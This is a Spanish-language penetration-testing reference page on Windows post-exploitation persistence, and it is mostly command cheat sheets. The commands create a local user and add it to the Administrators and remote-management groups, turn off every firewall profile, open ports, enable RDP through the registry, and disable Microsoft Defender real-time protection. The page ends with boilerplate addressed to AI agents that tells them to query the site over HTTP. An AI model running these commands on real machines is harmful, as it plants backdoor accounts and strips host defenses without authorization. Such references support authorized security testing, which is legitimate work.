> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/post-explotacion/persistencia/windows.md).

# Windows

## Creación de usuario

```shell
# Creación de usuario
net user <username> <password> /add
# Incorporación de usuario a grupo "administradores" (Permite RDP)
net localgroup Administrators <username> /add
# Incorporación de usuario a grupo "usuarios de administración remota" (Permite WinRM)
net localgroup "Remote Management Users" <username> /add
```

## Firewall

### Estado

```shell
netsh firewall show state
netsh advfirewall show allprofiles
```

### Desactivar

```shell
# Símbolo del sistema (cmd)
## desactivar todos los perfiles
netsh advfirewall set allprofiles state off
## desactivar por perfil
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off

# PowerShell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
```

### Apertura de puerto

```shell
netsh advfirewall firewall add rule name="Puerto TCP XXXX" dir=in action=allow protocol=TCP localport=<port>
```

### 3389/TCP (RDP) <a href="#firewall-3389-tcp-rdp" id="firewall-3389-tcp-rdp"></a>

```shell
# Revisión de existencia de puerto 3389/TCP abierto
netstat -an | findstr :3389
# Revisión de reglas actuales del firewall
netsh firewall show config
# Habilitación de servicio Terminal Server
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Incorporación de regla en firewall de apertura de puerto 3389/TCP
netsh firewall add portopening TCP 3389 "Remote Desktop Protocol"
```

## Microsoft Defender

Deshabilitar la protección en tiempo real.

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://pentesting.mrw0l05zyn.cl/post-explotacion/persistencia/windows.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.